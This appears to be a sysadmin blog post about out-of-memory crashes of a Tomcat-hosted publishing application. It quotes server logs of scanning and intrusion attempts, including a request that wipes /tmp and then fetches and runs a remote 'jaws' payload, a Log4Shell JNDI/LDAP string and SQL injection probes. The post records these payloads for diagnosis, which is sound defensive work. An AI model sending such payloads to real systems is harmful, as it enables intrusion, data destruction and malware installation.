Even when running on a single server, KotvaWrite Stories could easily be left unattended for a month without any special monitoring, provided the number of concurrent users is not overly high. An exception to this assumption are the mysterious cases where the memory and disk usage of the (Linux) virtual server suddenly rise sharply and stay elevated for some time. That can crash the application server on which the publishing application is installed. The consequences need not be critical: any unfinished database and file writes can, and should, be repaired and cleaned up semi-automatically, after which a simple restart of the application server may be enough to get things back to normal. However, if a large number of hacking attempts is involved, some OS-level resources may become exhausted, such as the number of open file descriptors (files currently held open for reading or writing).
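Whether that particular limit is actually being approached can be checked from the shell; a minimal sketch, where <java_pid> stands for the process ID of the Java process:

# limit on open files for the Java process, and how many it currently holds open (placeholder PID)
grep 'open files' /proc/<java_pid>/limits
ls /proc/<java_pid>/fd | wc -l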

Looking through the kernel log of the Linux operating system in use, one may notice that the Java process ran out of memory on e.g. 15.10.2022, 18.8.2022 and 5.8.2022:

[Sat Oct 15 23:42:37 2022] Out of memory: Killed process 1295081 (java)

[Thu Aug 18 11:45:30 2022] Out of memory: Killed process 272984 (java)

[Fri Aug 5 06:11:36 2022] Out of memory: Killed process 4157049 (java)
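Such entries can be found quickly with a search of the kernel ring buffer or of the system log; a minimal sketch, assuming a CentOS-style /var/log/messages as seen later in this article:

# human-readable timestamps from the kernel ring buffer
dmesg -T | grep -iE 'out of memory|killed process'
# the same events usually also end up in the system log
grep -i 'out of memory' /var/log/messages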

To be a bit more specific, the application server on which the publishing application is installed is actually a Java servlet container running on a Java Virtual Machine (JVM), and the limits within which the associated Java process is allowed to use memory are configurable. Stress tests have shown that certain memory settings are sufficient - until, for some reason, they are not.
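Assuming the servlet container is Apache Tomcat (the catalina log quoted later suggests as much), such limits are typically passed to the JVM via CATALINA_OPTS in bin/setenv.sh; the values below are purely illustrative:

# bin/setenv.sh - illustrative heap and metaspace limits for the Tomcat JVM
export CATALINA_OPTS="$CATALINA_OPTS -Xms512m -Xmx2048m -XX:MaxMetaspaceSize=256m"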

On the Linux operating system where the publishing application is installed, two APM (Application Performance Monitoring) agents are separately installed. They collect real-time information about both the operating system and the publishing application, which can then be viewed in a variety of ways in the web interfaces of the APM services (which might be New Relic and Datadog). In these out of memory cases, one and the same thing has always been found to be true: the amount of web traffic has not been a significant factor at a time when the virtual memory usage of the Java process has grown by e.g. a factor of 20 and a strangely large amount of disk has been used within a short period of time. At such times, it is not surprising that database queries might take more than ten seconds to run instead of the normal few milliseconds.

In addition, there is an external service such as Papertrail, which can be used to redirect log data from several sources, such as the application server and the operating system, so that the log data does not have to be read in a Linux shell but can instead be viewed through a web interface. A notion about hackers has emerged from browsing the gathered logs. It seems that someone, or some wannabe hackers, have done a lot of rather crude experimentation to get through the defences of the operating system, the application server and the publishing application. This has been ongoing throughout 2022, yet not once has there been an attempt at a Distributed Denial of Service (DDoS) attack; rather, there has been e.g. slow experimentation with usernames and passwords spread over a long period of time, with no more than a few dozen attempts per minute. That means every minute, every hour, every day and every month. Couldn't they just do something valid and successful the first time?
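Forwarding the operating system logs to such a service is typically done with rsyslog; a minimal sketch of the idea, where the destination host and port are placeholders that depend on one's own Papertrail account:

# /etc/rsyslog.conf - forward all syslog messages to Papertrail over TCP (placeholder destination)
*.* @@logsN.papertrailapp.com:XXXXX

Application server log files that never pass through syslog can be shipped with a separate agent, such as Papertrail's remote_syslog2, which tails the files directly.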

Contemplating the cause and timing of the out of memory errors tends to lead to the notion that some of the hacking attempts happen just seconds before the memory runs out, but could that have something to do with not having dedicated servers? That means the same physical hardware resources are used by more than one data centre client (in other words: the server is actually a so-called virtual server). Sometimes the actual hardware can cause failures, so the cause of the problems could also be something other than what can be seen in the available logs and dashboards displaying visualized data. However, the data centre service provider said there was no anomaly to report at the time of the problematic out of memory events.

Normally, when using a Hetzner virtual server, one instance of the CPX21 virtual server with 4 GB of memory and 3 vCPU cores has been enough for "basic use", but there are other possible explanations for out of memory errors and other strangely anomalous problems than those already mentioned. E.g. the application server might be way behind the latest version, and the same could apply to Java, the programming language used on the server side. There are also separate settings for when and how the application server and the JVM clean up memory to remove things that are no longer needed (garbage collection), but these are generally left at their default settings. All of this is quite manageable, but may require a lot of monitoring and testing to detect borderline cases.
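If one did want to move away from the defaults, the garbage collector and its logging can be adjusted with JVM options; a hedged sketch, again assuming Tomcat's bin/setenv.sh and Java 9 or later, with illustrative values and a placeholder log path:

# bin/setenv.sh - explicit garbage collector choice and GC logging (illustrative)
export CATALINA_OPTS="$CATALINA_OPTS -XX:+UseG1GC -XX:MaxGCPauseMillis=200 -Xlog:gc*:file=/var/log/tomcat/gc.log:time,uptime"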

The remainder of this article contains observations about a certain out of memory event. And if this is the place to send greetings to the administrators of the publishing application, it should be mentioned that some additional configuration could be done to ensure that client addresses appear in the application server logs as the original IP addresses instead of 127.0.0.1. Although, could the General Data Protection Regulation (GDPR) have anything to say about this?
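Assuming the 127.0.0.1 entries are explained by a local reverse proxy sitting in front of Tomcat and setting the X-Forwarded-For header, one way to restore the original client addresses in the access log is Tomcat's RemoteIpValve combined with requestAttributesEnabled on the access log valve; a sketch of the relevant part of conf/server.xml:

<!-- conf/server.xml - trust X-Forwarded-For from the local proxy (sketch) -->
<Valve className="org.apache.catalina.valves.RemoteIpValve"
       internalProxies="127\.0\.0\.1"
       remoteIpHeader="X-Forwarded-For" />
<Valve className="org.apache.catalina.valves.AccessLogValve"
       requestAttributesEnabled="true"
       directory="logs" prefix="localhost_access_log" suffix=".txt"
       pattern="%h %l %u %t &quot;%r&quot; %s %b" />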

Plenty of login attempts in the logfile /var/log/messages:

Oct 15 22:52:42 snapshot-47300778-centos-2gb-hel1-1-final sshd[2479370]: Invalid user ktx from 5.51.84.107 port 55716

Oct 15 22:52:42 snapshot-47300778-centos-2gb-hel1-1-final sshd[2479370]: Received disconnect from 5.51.84.107 port 55716:11: Bye Bye [preauth]

Oct 15 22:52:42 snapshot-47300778-centos-2gb-hel1-1-final sshd[2479370]: Disconnected from invalid user ktx 5.51.84.107 port 55716 [preauth]

Oct 15 22:52:56 snapshot-47300778-centos-2gb-hel1-1-final sshd[2479454]: Invalid user postgres from 195.88.87.19 port 53396

Oct 15 22:52:56 snapshot-47300778-centos-2gb-hel1-1-final sshd[2479454]: Received disconnect from 195.88.87.19 port 53396:11: Bye Bye [preauth]

Oct 15 22:52:56 snapshot-47300778-centos-2gb-hel1-1-final sshd[2479454]: Disconnected from invalid user postgres 195.88.87.19 port 53396 [preauth]

Oct 15 22:55:25 snapshot-47300778-centos-2gb-hel1-1-final sshd[2480086]: Invalid user Test from 179.60.147.99 port 37284

Oct 15 22:55:25 snapshot-47300778-centos-2gb-hel1-1-final sshd[2480086]: Connection closed by invalid user Test 179.60.147.99 port 37284 [preauth]

Oct 15 23:13:34 snapshot-47300778-centos-2gb-hel1-1-final sshd[2484695]: Invalid user support from 193.106.191.50 port 49598

Oct 15 23:13:43 snapshot-47300778-centos-2gb-hel1-1-final sshd[2484695]: Connection closed by invalid user support 193.106.191.50 port 49598 [preauth]

Oct 15 23:29:58 snapshot-47300778-centos-2gb-hel1-1-final sshd[2488819]: Invalid user Test from 179.60.147.99 port 55870

Oct 15 23:29:58 snapshot-47300778-centos-2gb-hel1-1-final sshd[2488819]: Connection closed by invalid user Test 179.60.147.99 port 55870 [preauth]

Oct 15 23:39:43 snapshot-47300778-centos-2gb-hel1-1-final sshd[2491284]: Received disconnect from 92.255.85.69 port 26930:11: Bye Bye [preauth]
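With attempts trickling in around the clock like this, a quick overview can be had by counting the invalid-user entries and the most active source addresses; a minimal sketch:

# total number of invalid-user attempts, and the ten most active source IPs
grep -c 'Invalid user' /var/log/messages
grep 'Invalid user' /var/log/messages | awk '{print $(NF-2)}' | sort | uniq -c | sort -rn | head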

A few suspicious log lines here and there in the application server log file localhost_access_log:

127.0.0.1 - - [15/Oct/2022:23:03:39 +0200] "POST /core/.env HTTP/1.1" 404 764

127.0.0.1 - - [15/Oct/2022:23:03:39 +0200] "GET /core/.env HTTP/1.1" 404 764

127.0.0.1 - - [15/Oct/2022:23:03:40 +0200] "POST / HTTP/1.1" 200 13720

127.0.0.1 - - [15/Oct/2022:23:03:40 +0200] "POST /core/.env HTTP/1.1" 404 764

127.0.0.1 - - [15/Oct/2022:23:21:47 +0200] "GET /view.jsp?solutionid=539'A=0&writingid=12501 HTTP/1.1" 200 13477

127.0.0.1 - - [15/Oct/2022:23:21:52 +0200] "GET /view.jsp?solutionid=539&writingid=12501'A=0 HTTP/1.1" 200 15507

A few hundred variations of attempts to access a web interface that is not even installed:

127.0.0.1 - - [15/Oct/2022:19:02:14 +0200] "GET /db/phpmyadmin/index.php?lang=en HTTP/1.1" 404 782

127.0.0.1 - - [15/Oct/2022:19:02:14 +0200] "GET /sql/phpmanager/index.php?lang=en HTTP/1.1" 404 783

127.0.0.1 - - [15/Oct/2022:19:02:14 +0200] "GET /mysql/pma/index.php?lang=en HTTP/1.1" 404 778

127.0.0.1 - - [15/Oct/2022:19:02:14 +0200] "GET /MyAdmin/index.php?lang=en HTTP/1.1" 404 772

127.0.0.1 - - [15/Oct/2022:19:02:14 +0200] "GET /sql/phpMyAdmin2/index.php?lang=en HTTP/1.1" 404 784

Trying to gain access by experimenting with parameters and guessing addresses:

127.0.0.1 - - [15/Oct/2022:16:18:21 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+81.161.229.46/jaws;sh+/tmp/jaws HTTP/1.1" 404 756

127.0.0.1 - - [15/Oct/2022:16:18:25 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+81.161.229.46/jaws;sh+/tmp/jaws HTTP/1.1" 404 756

127.0.0.1 - - [15/Oct/2022:16:06:46 +0200] "GET /admin.pl HTTP/1.1" 404 759

195.96.137.4 - - [15/Oct/2022:16:06:46 +0200] "GET /admin.jsa HTTP/1.1" 404 760

127.0.0.1 - - [15/Oct/2022:11:57:08 +0200] "GET /linusadmin-phpinfo.php HTTP/1.1" 404 773

127.0.0.1 - - [15/Oct/2022:11:57:08 +0200] "GET /infos.php HTTP/1.1" 404 760

127.0.0.1 - - [15/Oct/2022:10:22:58 +0200] "GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1" 404 790

127.0.0.1 - - [15/Oct/2022:10:22:58 +0200] "GET /test/wp-includes/wlwmanifest.xml HTTP/1.1" 404 791

82.99.217.202 - - [15/Oct/2022:07:52:03 +0200] "GET /?id=%24%7Bjndi%3Aldap%3A%2F%2F218.24.200.243%3A8066%2FTomcatBypass%2FY3D HTTP/1.1" 200 13720

127.0.0.1 - - [15/Oct/2022:01:29:44 +0200] "POST /FD873AC4-CF86-4FED-84EC-4BD59C6F17A7 HTTP/1.1" 404 787
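The scale of this kind of probing is easy to estimate from the access log by counting the requests that ended in a 404 and grouping them by requested path; a minimal sketch, assuming the default Tomcat access log format seen above (the exact file name will differ):

# most frequently probed non-existent paths in one day's access log
awk '$9 == 404 {print $7}' localhost_access_log.2022-10-15.txt | sort | uniq -c | sort -rn | head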

The second log on the application server (catalina) sometimes contains experiments against imaginary weaknesses; the byte sequences below appear to be TLS handshakes sent to the plain HTTP port:

14-Oct-2022 04:01:50.622 INFO [http-nio2-8080-exec-21] org.apache.coyote.http11.Http11Processor.service Error parsing HTTP request header

 Note: further occurrences of HTTP request parsing errors will be logged at DEBUG level.

       java.lang.IllegalArgumentException: Invalid character found in method name [0x160x030x010x00{0x01;0x993Z0x15e}0x005/0x050x010x00...]. HTTP method names must be tokens

15-Oct-2022 14:21:12.637 INFO [http-nio2-8080-exec-6] org.apache.coyote.http11.Http11Processor.service Error parsing HTTP request header

 Note: further occurrences of HTTP request parsing errors will be logged at DEBUG level.

   java.lang.IllegalArgumentException: Invalid character found in method name [0x160x030x010x00{0xe40x920x88{#{*<0xc80xec0xfc}l0x820x85\0xcc0x1a0xc0/0x0050xc00x000x00...]. HTTP method names must be tokens